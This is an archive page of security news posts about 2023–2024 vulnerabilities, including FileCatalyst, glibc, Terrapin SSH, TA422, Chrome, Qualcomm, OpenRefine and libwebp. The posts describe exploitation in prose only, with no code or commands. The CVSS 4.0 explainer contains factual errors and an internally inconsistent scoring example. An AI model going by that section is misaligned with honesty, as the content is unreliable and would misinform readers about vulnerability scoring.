Mar 19 2024

PoC exploit for critical Fortra FileCatalyst MFT vulnerability released (CVE-2024-25153)

Category: Security vulnerabilitiesdisc7 @ 6:21 pm

Proof-of-concept (PoC) exploit code for a critical RCE vulnerability (CVE-2024-25153) in Fortra FileCatalyst MFT solution has been published.

About CVE-2024-25153

Fortra FileCatalyst is an enterprise managed file transfer (MFT) software solution that includes several components: FileCatalyst Direct, Workflow, and Central.

CVE-2024-25153 is a directory traversal vulnerability in FileCatalyst Workflow’s web portal that could allow a remote authenticated threat actor to execute arbitrary code on vulnerable servers.

“A directory traversal within the ‘ftpservlet’ of the FileCatalyst Workflow Web Portal allows files to be uploaded outside of the intended ‘uploadtemp’ directory with a specially crafted POST request. In situations where a file is successfully uploaded to web portal’s DocumentRoot, specially crafted JSP files could be used to execute code, including web shells,” the company noted in the advisory.

The vulnerability was first discovered in August 2023 and patched a few days later in the FileCatalyst version 5.1.6 Build 114, but had no CVE identifier at the time.

The identifier was assigned after Fortra became a CVE Numbering Authority (CNA) in December 2023.

The company and Tom Wedgbury, the security researcher that discovered and reported the flaw, planned its coordinated disclosure in March 2024.

CVE-2024-25153 PoC exploit released

Fortra’s security advisory and Wedgbury’s blog post with technical details and the PoC have been published on Wednesday.

There are currently no indications of the vulnerability being exploited in the wild, but organizations are nevertheless advised to apply the available patch (if they haven’t already).

When a PoC for a critical authentication bypass vulnerability (CVE-2024-0204) in Fortra’s GoAnywhere MFT solution was recently made public, exploit attempts began soon after.

In late January 2023, the Cl0p ransomware group leveraged a zero-day vulnerability (CVE-2023-0669) in the same solution, and stole data of over 130 victim organizations.

InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: PoC exploit code


Feb 03 2024

HACKING DEBIAN, UBUNTU, REDHAT& FEDORA SERVERS USING A SINGLE VULNERABILITY IN 2024

Category: Hacking,Linux Security,Security vulnerabilitiesdisc7 @ 11:47 am

The recent discovery of a significant flaw in the GNU C Library (glibc), a fundamental component of major Linux distributions, has raised serious security concerns. This flaw grants attackers root access, posing a critical threat to the security of Linux systems.

  • Vulnerability in GNU C Library (glibc): The GNU C Library, commonly known as glibc, is an essential part of Linux distributions. It provides the core libraries for the system, including those used for file handling, mathematical computations, and system calls.
  • Root Access Granted: The flaw discovered in glibc allows attackers to gain full root access to Linux machines. Root access means having complete control over the system, enabling an attacker to perform any action, including installing software, accessing all files, and modifying system configurations.

CVE ID: CVE-2023-6246

  • Description: This vulnerability is related to a dynamic memory buffer overflow and is classified as a Local Privilege Escalation (LPE) issue. It was found in glibc’s __vsyslog_internal() function, which is called by the widely-used syslog and vsyslog functions.
  • Impact: The flaw allows unprivileged attackers to gain root access on various major Linux distributions in their default configurations. This level of access can enable attackers to take complete control over the affected system.
  • Severity: Given its potential for granting root access, this vulnerability is considered highly severe.

HOW THE FLAW WORKS

  • Local Privilege Escalation: The vulnerability is a local privilege escalation (LPE) issue. This means that an attacker who already has access to the system (even with limited privileges) can exploit this flaw to gain root-level access.
  • Exploitation Requirements: To exploit this flaw, attackers need a Set-User-ID (SUID) binary. SUID is a special type of file permission that allows users to execute a program with the permissions of the file owner, which in many cases is the root user.

IMPACT AND SEVERITY

  • Widespread Impact: Given the ubiquitous use of glibc in Linux distributions, the impact of this vulnerability is widespread, affecting a vast number of systems and applications.
  • High Severity: The flaw is considered high severity due to its potential to grant attackers complete control over the affected systems.

MITIGATION AND RESPONSE

  • Disabling SUID Binaries: One suggested mitigation is to disable SUID binaries using “no new privileges” mode, which can be implemented with tools like systemd or bwrap.
  • Patch and Update: Users and administrators are urged to apply patches and updates provided by their Linux distribution as soon as they become available. Staying updated is crucial in preventing the exploitation of this vulnerability.

The discovery of the glibc flaw that grants root access to major Linux distributions is a stark reminder of the importance of system security and the need for constant vigilance. Users and administrators must take immediate action to mitigate the risk by applying patches and employing security best practices. As Linux continues to be a backbone for many systems and networks, ensuring its security is paramount for the integrity of countless applications and services.

Linux Basics for Hackers: Getting Started with Networking, Scripting, and Security in Kali

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: HACKING DEBIAN, REDHAT& FEDORA, UBUNTU


Dec 19 2023

SSH vulnerability exploitable in Terrapin attacks (CVE-2023-48795)

Category: Security vulnerabilitiesdisc7 @ 8:32 am

Security researchers have discovered a vulnerability (CVE-2023-48795) in the SSH cryptographic network protocol that could allow an attacker to downgrade the connection’s security by truncating the extension negotiation message.

The Terrapin attack

Terrapin is a prefix truncation attack targeting the SSH protocol.

“By carefully adjusting the sequence numbers during the handshake, an attacker can remove an arbitrary amount of messages sent by the client or server at the beginning of the secure channel without the client or server noticing it,” researchers Fabian Bäumer, Marcus Brinkmann and Jörg Schwenk of Ruhr-Universität Bochum have found.

Aside from downgrading the SSH connection’s security by forcing it to use less secure client authentication algorithms, the attack can also be used to exploit vulnerabilites in SSH implementations.

“For example, we found several weaknesses [CVE-2023-46445, CVE-2023-46446] in the AsyncSSH servers’ state machine, allowing an attacker to sign a victim’s client into another account without the victim noticing. Hence, it will enable strong phishing attacks and may grant the attacker Man-in-the-Middle (MitM) capabilities within the encrypted session.”

To pull of a Terrapin attack, though, the attacker must already be able to intercept and modify the data sent from the client or server to the remote peer, they pointed out, making it more feasible to be performed on the local network.

“Besides that, we also require the use of a vulnerable encryption mode. Encrypt-then-MAC and ChaCha20-Poly1305 have been introduced by OpenSSH over 10 years ago. Both have become the default for many years and as such spread across the SSH ecosystem. Our scan indicated that at least 77% of SSH servers on the internet supported at least one mode that can be exploited in practice.”

More details about their findings can be found in their paper and on a dedicated website.

Patches released or incoming

The researchers have contacted nearly 30 providers of various SSH implementations and shared their research so they may provide fixes before publication.

“Many vendors have updated their SSH implementation to support an optional strict key exchange. Strict key exchange is a backwards-incompatible change to the SSH handshake which introduces sequence number resets and takes away an attacker’s capability to inject packets during the initial, unencrypted handshake,” they shared.

But it will take a while for all clients and servers out there to be updated – and both “parties” must be for the connection to be secure against the Terrapin attack.

Vendors/maintainers of affected implementations, applications and Linux distros have been pushing out fixes: AsyncSSHLibSSHOpenSSHPuTTYTransmitSUSE, and others.

Administrators can also use the Terrapin Vulnerability Scanner to determine whether an SSH client or server is vulnerable.

“The scanner connects to your SSH server (or listens for an incoming client connection) to detect whether vulnerable encryption modes are offered and if the strict key exchange countermeasure is supported. It does not perform a fully-fledged handshake, nor does it actually perform the attack,” they explained.

Mastering Linux Security and Hardening: Protect your Linux systems from intruders, malware attacks, and other cyber threats

SSH Mastery: OpenSSH, PuTTY, Tunnels and Keys 

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: Terrapin attacks


Dec 08 2023

TA422 Hackers Attack Organizations Using Outlook & WinRAR Vulnerabilities

Category: Hacking,Security vulnerabilitiesdisc7 @ 11:18 am

Hackers exploit Outlook and WinRAR vulnerabilities because these widely used software programs are lucrative targets. 

Outlook vulnerabilities offer:-

  • Access to sensitive emails 
  • Access to sensitive information

WinRAR vulnerabilities provide an entry point to manipulate compressed files, potentially executing malicious code on a victim’s system.

Cybersecurity researchers at Proofpoint recently discovered that the TA422 APT Group is actively exploiting the Outlook and WinRAR vulnerabilities to attack organizations.

Exploiting Of Patched Vulnerabilities

Since March 2023, Proofpoint found Russian APT TA422 using patched vulnerabilities to target Europe and North America. The TA422 APT group is linked to the following groups and tied to the Russian GRU by the US Intelligence Community:-

While engaging in typical targeted actions, TA422 showed an unexpected surge in emails exploiting CVE-2023-23397, a Microsoft Outlook vulnerability, sending over 10,000 emails to diverse sectors. 

Besides this, the operators of the TA422 APT group also exploited a WinRAR vulnerability, CVE-2023-38831, in their campaigns.

TA422 launched massive campaigns in March 2023, exploiting CVE-2023-23397 against targets in:-

  • Europe
  • North America

Earlier, they targeted Ukrainian entities in April 2022 using the same exploit. Proofpoint noticed a significant surge in activity, with over 10,000 attempts to exploit a Microsoft Outlook vulnerability during late summer 2023. 

It’s unclear if this was a mistake or a deliberate effort to gather target credentials. TA422 re-targeted higher education and manufacturing users, suggesting these entities are priority targets. 

In the late summer campaign, TA422 used an appointment attachment with a fake file extension, leading to an SMB listener on a compromised Ubiquiti router. 

This router acted as an NTLM listener, recording inbound credential hashes without extensive network engagement when Outlook processed the attachment.

Late summer 2023 sample of TA422 phishing email. (Source – Proofpoint)

Proofpoint’s tracking of Portugalmail addresses revealed more TA422 activity. In September 2023, TA422 exploited WinRAR vulnerability CVE-2023-32231 in two campaigns, using different Portugalmail addresses and spoofing geopolitical entities. 

Emails with BRICS Summit and European Parliament meeting subjects contained RAR attachments dropping a .cmd file. 

The file modified proxy settings downloaded a lure document, and connected to an IP-literal Responder server. The server, likely a compromised Fortigate FortiOS Firewall, initiated the NTLM credential exchange.

Lure document from the September 1, 2023 campaign. (Source – Proofpoint)

Between September and November 2023, Proofpoint tracked TA422 campaigns using Portugalmail and Mockbin for redirection.

Mockbin campaign lure documents. (Source – Proofpoint)

Targeting government and defense sectors, TA422 employed Mockbin to lead victims to InfinityFree domains. After browser fingerprinting, victims were directed to InfinityFree, initiating a chain of activity.

Despite the exploitation of disclosed vulnerabilities like CVE-2023-23397 and CVE-2023-38831, TA422 persists, likely relying on unpatched systems for continued success.

IOCs

IOCs (Source – Proofpoint)

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: Outlook Vulnerabilities, WinRAR Vulnerabilities


Nov 02 2023

CVSS 4.0 EXPLAINED: FROM COMPLEXITY TO CLARITY IN VULNERABILITY ASSESSMENT

Category: Security vulnerabilitiesdisc7 @ 4:07 pm

The Common Vulnerability Scoring System (CVSS) has been updated to version 4.0, which has been formally announced by the Forum of Incident Response and Security Teams (FIRST). This update comes eight years after the debut of CVSS v3.0, the previous version of the system. At its 35th annual conference, which took place in June in Montreal, Canada, FIRST presented CVSS 4.0 to the attendees. The Common Vulnerability Scoring System, also known as CVSS, is a standardised framework for evaluating the severity of software vulnerabilities. It does this by assigning numerical scores or qualitative labels (such as low, medium, high, and critical) based on factors such as exploitability, impact on confidentiality, integrity, availability, and required privileges, with higher scores indicating more severe vulnerabilities.

The Common Vulnerability Scoring System, more often referred to as CVSS, is a methodology that provides a framework for evaluating and conveying the severity of software vulnerabilities. It offers a standardised way that organisations and security experts may use to analyse vulnerabilities based on the characteristics of the vulnerabilities, and then prioritise those vulnerabilities. The CVSS ratings provide assistance in making educated judgements on which vulnerabilities should be addressed first and how resources should be distributed for vulnerability management.

There have been several versions of CVSS, and each version has included enhancements and modifications that make it possible to more accurately evaluate the severity of vulnerabilities. The previous version, CVSS 3.1, has been upgraded to the current version, CVSS 4.0, which includes a number of significant updates and enhancements, including the following:

CVSS 4.0 has been designed with the goal of simplifying the scoring system and making it more accessible to users. It makes the scoring process more straightforward, which makes it simpler for security experts to grasp and put into practise.

Accurate Scoring: CVSS 4.0 includes enhancements in scoring to enable more accurate evaluations of vulnerabilities. These improvements were made possible by the introduction of new scoring methods. It improves the base, temporal, and environmental parameters such that a more accurate representation of the real effect of a vulnerability may be achieved.

Enhanced Metrics: It provides new metrics, such as Scope and Attack Vector, to offer more insights about the nature of the vulnerability and its effect on the system. Enhanced Metrics.

Formula: CVSS 4.0 comes with a revised formula that may be used to determine the total score on the CVSS scale. When paired with additional indicators, this formula provides a more accurate representation of the severity of vulnerabilities.

Contextual Information: When it comes to rating vulnerabilities, CVSS 4.0 strongly recommends making advantage of any available contextual information. This contributes to the provision of a vulnerability assessment that is more precise and relevant depending on certain deployment circumstances.

Increased Scoring Flexibility: The updated version offers an increased degree of scoring flexibility for vulnerabilities. Users are given the option to choose several temporal and environmental criteria, so that the data may more accurately represent their unique situations.

The Common Vulnerability Scoring System (CVSS) version 4.0 marks an advancement in vulnerability scoring and solves some of the restrictions that were present in prior versions. It seeks to offer a system for analysing and prioritising vulnerabilities that is both more accurate and easier to use, with the ultimate goal of assisting organisations in improving their security posture by concentrating on the most pressing problems. In order to improve their vulnerability management procedures, security professionals and organisations should get aware with CVSS 4.0 and consider implementing it.

Lets take  an example of how you would use CVSS 4.0 to determine the degree of severity of a software vulnerability. For the sake of this example, we will employ a made-up vulnerability:

Vulnerability Description: An application contains a buffer overflow vulnerability, which an attacker can exploit to execute arbitrary code on the affected system.

Here’s how you would use CVSS 4.0 to assess the severity of this vulnerability:

Base Metrics:

  • Attack Vector (AV): The vulnerability can be exploited via network (AV:N). The attacker does not need local access to the system.
  • Attack Complexity (AC): The attack requires no special conditions (AC:LOW). It’s relatively easy to exploit.
  • Privileges Required (PR): The attacker needs to gain elevated privileges (PR:HIGH). This makes it more challenging to exploit.
  • User Interaction (UI): No user interaction is required (UI:NONE).
  • Scope (S): The scope of the vulnerability is unchanged, and it doesn’t impact other components (S:UNCHANGED).

Temporal Metrics:

  • Exploit Code Maturity (E): There is proof of concept code available, but no known exploits in the wild (E:POC).
  • Remediation Level (RL): There is an official fix available (RL:OFFICIAL-FIX).
  • Report Confidence (RC): The vulnerability has been confirmed by multiple sources (RC:HIGH).

Environmental Metrics (Specific to the organization’s setup):

  • Modified Attack Vector (MAV): The organization’s security controls have made it harder for attackers to exploit this vulnerability (MAV:NETWORK).
  • Modified Attack Complexity (MAC): The organization’s security measures have increased the difficulty of exploitation (MAC:HIGH).
  • Modified Privileges Required (MPR): The organization’s security settings require lower privileges for successful exploitation (MPR:LOW).

Now, you can calculate the CVSS 4.0 score based on these metrics:

  1. Calculate the Base Score: In this case, it might be, for example, 7.8.
  2. Calculate the Temporal Score by considering the temporal metrics: Let’s say it’s 6.2.
  3. Calculate the Environmental Score, taking into account the environmental metrics and organization-specific factors: The final score might be 4.3.

The overall CVSS 4.0 score for this vulnerability would be the Environmental Score, which is 4.3 in this example. This score helps organizations understand the severity of the vulnerability in their specific context, considering the mitigations and configurations in place.

The higher the CVSS score, the more severe the vulnerability. Organizations can then prioritize addressing vulnerabilities with higher scores to improve their security posture. CVSS 4.0 offers more flexibility and a better representation of the vulnerability’s impact, taking into account various contextual factors.

Cybersecurity Critical Vulnerability CVSS Score Vector: Grid Ruled Notebook, Funny Gift, 120 Pages, 7×8, for Writing Down Security Engineering or Design Ideas

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: CVSS 4.0


Oct 13 2023

HOW GOOGLE CHROME VULNERABILITY CAN PUT MILLIONS OF USERS IN DANGER – SAFEGUARD YOUR DATA NOW!

IN-DEPTH ANALYSIS: NAVIGATING THE PERILS OF CVE-2023-5218 IN GOOGLE CHROME

The digital realm, while offering boundless possibilities, is also a fertile ground for myriad cybersecurity threats. One such peril that has recently come to light is the User-After-Free vulnerability in Google Chrome, specifically identified as CVE-2023-5218. This vulnerability not only poses a significant threat to user data and system integrity but also opens a Pandora’s box of potential cyber-attacks and exploitations.

UNRAVELING THE USER-AFTER-FREE VULNERABILITY

The User-After-Free vulnerability is a type of cybersecurity flaw that surfaces when a program continues to utilize memory space after it has been freed or deleted. This flaw allows attackers to execute arbitrary code or potentially gain unauthorized access to a system. CVE-2023-5218, identified within Google Chrome, was noted to be potentially exploitable to perform such malicious actions, thereby putting users’ data and privacy at substantial risk.

TIMELINE AND DISCOVERY

CVE-2023-5218 was unveiled to the public through various cybersecurity platforms and researchers who detected unusual activities and potential exploitation trails leading back to this particular flaw. This vulnerability was identified to be present in a specific Chrome component, prompting Google to release a flurry of updates and patches to mitigate the associated risks.

THE EXPLOIT MECHANICS

Exploiting CVE-2023-5218 allows attackers to manipulate the aforementioned ‘freed’ memory space, enabling them to execute arbitrary code within the context of the affected application. In the context of Chrome, this could potentially allow attackers unauthorized access to sensitive user data, such as saved passwords or personal information, or even navigate the browser to malware-laden websites without user consent.

THE POTENTIAL IMPACT

The exploitation of CVE-2023-5218 could have a multifold impact:

  • Data Theft: Sensitive user data, including login credentials, personal information, and financial details, could be compromised.
  • System Control: Attackers could gain control over the affected system, using it to launch further attacks or for other malicious purposes.
  • Malware Spread: By redirecting browsers to malicious websites, malware could be injected into users’ systems, further expanding the impact of the attack.

TECHNICAL INSIGHTS INTO CVE-2023-5218

  • Vulnerability Class: Use After Free
  • Impact: Confidentiality, Integrity, and Availability
  • Disclosure Date: 10/11/2023
  • AdvisoryChrome Releases Blog
TECHNICAL SYNOPSIS

The vulnerability is rooted in the improper handling of memory in the Site Isolation component of Google Chrome. The flaw arises from referencing memory after it has been freed, which can lead to program crashes, unexpected value utilization, or arbitrary code execution. The vulnerability is classified under CWE-416 and CWE-119, indicating its potential to improperly restrict operations within the bounds of a memory buffer and its susceptibility to use after free exploits.

MITIGATION AND COUNTERMEASURES

The primary mitigation strategy recommended is upgrading to Google Chrome version 118.0.5993.70, which eliminates this vulnerability. However, considering the potential risks associated with such vulnerabilities, organizations and individual users are advised to:

  • Regularly update and patch software to safeguard against known vulnerabilities.
  • Employ robust cybersecurity practices, including using security software and adhering to safe browsing practices.
  • Educate users on recognizing and avoiding potential phishing attempts or malicious sites that might exploit such vulnerabilities.

CONCLUSION

The identification and subsequent mitigation of CVE-2023-5218 underscore the perpetual battle between cybersecurity professionals and cyber adversaries. While this vulnerability has been addressed in the latest Chrome update, it serves as a potent reminder of the criticality of maintaining up-to-date systems and employing prudent cybersecurity practices. As we navigate through the digital era, the complexity and sophistication of cyber threats continue to evolve, making vigilance and preparedness crucial in ensuring secure digital interactions.

The Google Workspace Bible: [14 in 1] The Ultimate All-in-One Guide from Beginner to Advanced | Including Gmail, Drive, Docs, Sheets, and Every Other App from the Suite

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: Google Chrome


Oct 12 2023

Adobe, Cisco IOS, Skype, WordPad, and HTTP/2 Rapid Reset Flaws Actively Exploited: CISA Warns

Category: Security vulnerabilitiesdisc7 @ 9:25 am

The US cybersecurity organization CISA has updated its Known Exploited Vulnerabilities catalog to include five new security flaws that are currently being actively exploited.

This means that attackers are using these vulnerabilities to gain unauthorized access to computer systems, steal sensitive data, or cause damage to critical infrastructure.

It is crucial for organizations to be aware of these vulnerabilities and take immediate steps to mitigate the risk of exploitation.

Earlier this year, several vulnerabilities were reported in popular software applications such as Acrobat, Cisco IOS, WordPad, Skype, and HTTP/2 Rapid Reset.

As a precautionary measure, businesses are advised by CISA to be wary of these vulnerabilities and take necessary steps to secure their systems against potential cyber-attacks.

Malicious cyber actors often exploit these vulnerabilities as they are commonly found in the federal enterprise, posing significant threats to their security.

Five Actively Exploited Flaws

  • CVE-2023-21608 Adobe Acrobat and Reader Use-After-Free Vulnerability

A Use After Free vulnerability in Adobe Acrobat Reader versions 22.003.20282 (and earlier), 22.003.20281 (and earlier), and 20.005.30418 (and earlier) might lead to arbitrary code execution in the context of the current user.

This vulnerability can only be exploited if the victim opens a malicious file that involves user involvement. Adobe patched the vulnerability in January 2023, and the PoC exploit code for this issue is available.

An authenticated, remote attacker with administrative access to a group member or a key server could exploit a vulnerability in the Cisco Group Encrypted Transport VPN (GET VPN) feature of Cisco IOS Software and Cisco IOS XE Software.

A successful exploit might give the attacker complete control of the targeted system and the ability to run arbitrary code, or it could force the target system to reload, resulting in a DoS attack. Cisco fixed the flaw at the end of September.

  • CVE-2023-41763 Microsoft Skype for Business Privilege Escalation Vulnerability

An elevation of privilege vulnerability in Skype for Business is identified as CVE-2023-41763.

“An attacker could make a specially crafted network call to the target Skype for Business server, which could cause the parsing of an HTTP request made to an arbitrary address. This could disclose IP addresses or port numbers or both to the attacker”, Microsoft warns.

The attacker may obtain certain private, sensitive data, and in some situations, the information that was revealed could provide the attacker access to internal networks. Microsoft patched the flaw in its October Patch Tuesday release.

  • CVE-2023-36563 Microsoft WordPad Information Disclosure Vulnerability

This is an information disclosure vulnerability in Microsoft WordPad. Because of the flaw, NTLM hashes can be revealed under certain circumstances. 

To exploit the issue, an attacker would need to be able to get into the system, but if a footing is gained, the adversary could then launch a specially crafted application and seize control of an affected machine.

“The attacker would have to convince the user to click a link, typically by way of an enticement in an email or instant message, and then convince them to open the specially crafted file,” Microsoft said.

Microsoft patched the flaw in its October Patch Tuesday release.

The HTTP/2 protocol flaw CVE-2023-44487 has recently been utilized to execute massive DDoS attacks against several targets. The HTTP/2 protocol’s handling of request cancellations or resets is the source of the issue.

When a client makes a reset for an HTTP/2 request, it consumes server resources by canceling the relevant stream. 

However, the client can start a new stream right away after initiating a reset. The quick opening and closing of HTTP/2 streams brings on the denial of service.

This vulnerability may affect many web platforms because HTTP/2 has been implemented into so many of them.

CISA urges all organizations to prioritize promptly repairing Catalogue vulnerabilities as part of their vulnerability management procedures to reduce their exposure to attacks.

Cybersecurity and Infrastructure Security Agency (CISA) TIPS

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: Cybersecurity and Infrastructure Security Agency


Oct 04 2023

ZERO DAY VULNERABILITIES IN QUALCOMM CHIPS ALLOW HACKING INTO BILLION MOBILE PHONES IN WORLD

Category: Security vulnerabilities,Zero daydisc7 @ 10:25 am

Qualcomm recently issued warnings about three zero-day vulnerabilities within its GPU and Compute DSP drivers that are currently being exploited by hackers. These warnings were initiated based on information received from Google’s Threat Analysis Group (TAG) and Project Zero teams. According to their reports, there is limited but targeted exploitation of vulnerabilities identified as CVE-2023-33106, CVE-2023-33107, CVE-2022-22071, and CVE-2023-33063.

In response to these imminent threats, Qualcomm has rolled out security updates designed to rectify the issues present within its Adreno GPU and Compute DSP drivers. The company has promptly communicated this information to the affected Original Equipment Manufacturers (OEMs), urging them to implement these security updates without delay.

One of the significant flaws, CVE-2022-22071, which was initially disclosed in May 2022, is categorized as a high-severity issue, with a CVSS v3.1 score of 8.4. This vulnerability is a use-after-free bug that can be exploited locally and affects widely-used chips, including the SD855, SD865 5G, and SD888 5G.

However, Qualcomm has opted to remain tight-lipped regarding the details of the other actively exploited vulnerabilities, namely CVE-2023-33106, CVE-2022-22071, and CVE-2023-33063. Further information on these vulnerabilities is expected to be disclosed in the company’s security bulletin scheduled for December 2023.

In addition to these, Qualcomm’s recent security bulletin also shed light on three other critical vulnerabilities, each with severe implications:

  • CVE-2023-24855 involves memory corruption within Qualcomm’s Modem component. This occurs when processing security-related configurations prior to the AS Security Exchange and has a CVSS v3.1 score of 9.8.
  • CVE-2023-28540 relates to a cryptographic issue within the Data Modem component, resulting from insufficient authentication processes during TLS handshakes, with a CVSS v3.1 score of 9.1.
  • CVE-2023-33028 involves memory corruption in the WLAN firmware which occurs during the copying of pmk cache memory without conducting necessary size checks, and it holds a CVSS v3.1 score of 9.8.

In light of these findings, Qualcomm disclosed an additional 13 high-severity flaws along with three more vulnerabilities classified as critical, all of which were identified by the company’s engineers. In total, Qualcomm has released updates to address 17 vulnerabilities across various components while highlighting that three zero-day vulnerabilities are currently being actively exploited.

Of these identified vulnerabilities, three have been classified as critical, 13 are high-severity, and one is medium-severity. Qualcomm’s advisory noted: “There are indications from Google Threat Analysis Group and Google Project Zero that CVE-2023-33106, CVE-2023-33107, CVE-2022-22071, and CVE-2023-33063 may be under limited, targeted exploitation.”

To safeguard against these vulnerabilities, patches for issues in the Adreno GPU and Compute DSP drivers have been issued and are readily available. OEMs have been duly notified and strongly urged to deploy these security patches at the earliest convenience to prevent potential exploitation.

Users of Qualcomm products are advised to stay vigilant and apply updates provided by OEMs as soon as they are released to ensure their devices are protected from these vulnerabilities. This proactive approach to device security is crucial in mitigating the risk of exploitation and maintaining the integrity and functionality of devices that play a pivotal role in various technological applications.

Hacking for Beginners: A Step by Step Guide to Learn How to Hack Websites, Smartphones, Wireless Networks, Work with Social Engineering, Complete a Penetration Test, and Keep Your Computer Safe

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: Hacking Mobile Phone


Oct 03 2023

Zip Slip Vulnerability Let Attacker Import Malicious Code and Execute Arbitrary Code

Category: Cyber Attack,Security vulnerabilitiesdisc7 @ 9:02 am

A critical Zip Slip vulnerability was discovered in the open-source data cleaning and transformation tool ‘OpenRefine’, which allowed attackers to import malicious code and execute arbitrary code.

OpenRefine is a strong Java-based, free, open-source tool for handling messy data. This includes cleaning it, converting it into a different format, and expanding it with web services and external data.

According to SonarCloud, the Zip Slip vulnerability in OpenRefine allows attackers to overwrite existing files or the extraction of contents to unexpected locations. This vulnerability is caused by insufficient path validation while extracting archives.

Details of the OpenRefine Zip Slip Vulnerability

The project import feature of OpenRefine versions 3.7.3 and earlier is vulnerable to a Zip Slip vulnerability (CVE-2023-37476) with a CVSS score of 7.8. 

Although OpenRefine is only intended to execute locally on a user’s computer, a user can be tricked into importing a malicious project file. Once this file is imported, the attacker will be able to run arbitrary code on the victim’s computer.

Web Interface of OpenRefine Tool

“The vulnerability gives attackers a strong primitive: writing files with arbitrary content to an arbitrary location on the filesystem. For applications running with root privileges, there are dozens of possibilities to turn this into arbitrary code execution on the operating system: adding a new user to the passwd file, adding an SSH key, creating a cron job, and more”, researchers said.

Fix Available

OpenRefine Version 3.7.4, published on July 17, 2023, has a fix for the issue.

In light of this, Users are recommended to update to OpenRefine 3.7.4 as soon as feasible.

The Hacker and the State: Cyber Attacks and the New Normal of Geopolitics

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: Execute Arbitrary Code


Sep 29 2023

THIS ZERO DAY VULNERABILITY COULD YOU USED TO HACK INTO IPHONE, ANDROID, CHROME AND MANY OTHER SOFTWARE

Category: Security vulnerabilities,Smart Phone,Zero daydisc7 @ 9:22 am

Google has designated a brand new CVE number for a major security vulnerability that has been discovered in the libwebp image library, which is used for displaying pictures in the WebP format. This flaw has been found to be exploited in the wild by malicious users. A major vulnerability that existed in Google Chrome for Windows, macOS, and Linux was addressed by a security update that was provided by Google. A CVE ID of CVE-2023-4863 has been assigned to the security flaw, and the vulnerability has been rated as having a severity of 8.8 (High).

As a result of the analysis of the vulnerability, it was found that the libwebp library included a heap buffer overflow vulnerability. This vulnerability allows a threat actor to conduct an out-of-bounds memory write by using a crafted HTML page to trigger the issue.

However, Google has once again reported this vulnerability, which is now known as CVE-2023-5129 and is being monitored. After further investigation, it was discovered that the vulnerability known as CVE-2023-41064 and this one also impacted the same libwebp library. The development comes after Apple, Google, and Mozilla provided remedies to address a flaw that may enable arbitrary code execution when processing a carefully designed picture. The bug is tracked separately as CVE-2023-41064 and CVE-2023-4863. The execution of arbitrary code might lead to a security breach. It is likely that both problems are solutions to the same fundamental issue that exists in the library. CVE-2023-41064 is claimed to have been linked with CVE-2023-41061 as part of a zero-click iMessage attack chain termed BLASTPASS to deliver a mercenary malware known as Pegasus, as stated by the Citizen Lab. At this time, we do not have access to any other technical specifics.

But the choice to “wrongly scope” CVE-2023-4863 as a vulnerability in Google Chrome belied the reality that it also affects practically every other program that depends on the libwebp library to handle WebP pictures, showing that it had a wider effect than was originally supposed. CVE-2023-4863 was discovered by Google security researchers and is tracked by the CVE identifier.

An investigation carried out by Rezillion over the last week has uncovered a comprehensive list of frequently used software programs, code libraries, frameworks, and operating systems that are susceptible to the CVE-2023-4863 vulnerability.

Additionally, the security researcher who found the vulnerabilities CVE-2023-41064 and CVE-2023-4863 reported both of them. This indicates that the researcher brought this issue to the attention of both firms, which led to the creation of two distinct CVEs in the past.

ZIYUETEK USB Data Blocker, Charge-Only Adapter USB Blocker(2PCS), Provide Safe and high-Speed Charging, Protect Against Juice Jacking, Hacking

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: HACK INTO IPHONE


Sep 28 2023

5 free vulnerability scanners you should check out

Category: Security vulnerabilitiesdisc7 @ 9:39 am

Vulnerability scanners delve into systems to uncover security gaps. The primary mission? To fortify organizations against breaches and shield sensitive data from exposure.

Beyond merely pinpointing weaknesses, vulnerability scanning is a proactive measure to anticipate potential attacker entry points. The essence of this process lies not just in detection but in remediation and refining strategies, ensuring that vulnerabilities are prioritized.

Here’s a list of 5 free, open-source vulnerability scanners you can try today.

Nuclei

Nuclei is a scanner designed to probe modern applications, infrastructure, cloud settings, and networks, assisting in identifying and correcting vulnerabilities. Internally, Nuclei relies on the principle of templates. These YAML files detail how to identify, rank, and fix specific security threats. A global community of security professionals and researchers actively contributes to the template library. This ecosystem, continuously updated within the Nuclei tool, has received over 5000 templates.

Nikto

Nikto is a web server scanning tool that conducts in-depth tests on web servers. It checks for over 6700 potentially dangerous files/programs, including certain files or programs, inspects for outdated versions of more than 1250 servers, and looks for particular issues in over 270 server versions. Nikto isn’t crafted for discreet operations. It aims to assess a web server as swiftly as possible, leaving evident traces in log files or being detectable by IPS/IDS systems. Nevertheless, it supports LibWhisker’s methods to counteract IDS, whether to experiment with or evaluate an IDS setup.

free vulnerability scanners

Cariddi

Cariddi enables you to take a list of domains, crawl URLs, and scan for endpoints, secrets, API keys, file extensions, tokens, and more.

OpenVAS

OpenVAS is a comprehensive vulnerability scanning tool. It offers both unauthenticated and authenticated testing, supports a range of high-level and low-level internet and industrial protocols, provides performance optimization for large-scale scans, and features a robust internal scripting language to design any vulnerability test.

free vulnerability scanners

Wapiti

Wapiti is a tool designed to assess the security of your websites or web applications. It conducts “black-box” scans, meaning it doesn’t analyze the source code. Instead, it navigates through the webpages of the live web application, searching for scripts and forms to input data. After identifying the list of URLs, forms, and their respective inputs, Wapiti functions like a fuzzer, introducing payloads to determine if a script is susceptible to vulnerabilities.

More resources:

Practical Vulnerability Management: A Strategic Approach to Managing Cyber Risk

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: free vulnerability scanners


Sep 20 2023

Nagios Monitoring Tool Vulnerabilities Let Attackers Perform SQL Injection

Category: Security Tools,Security vulnerabilitiesdisc7 @ 9:47 am

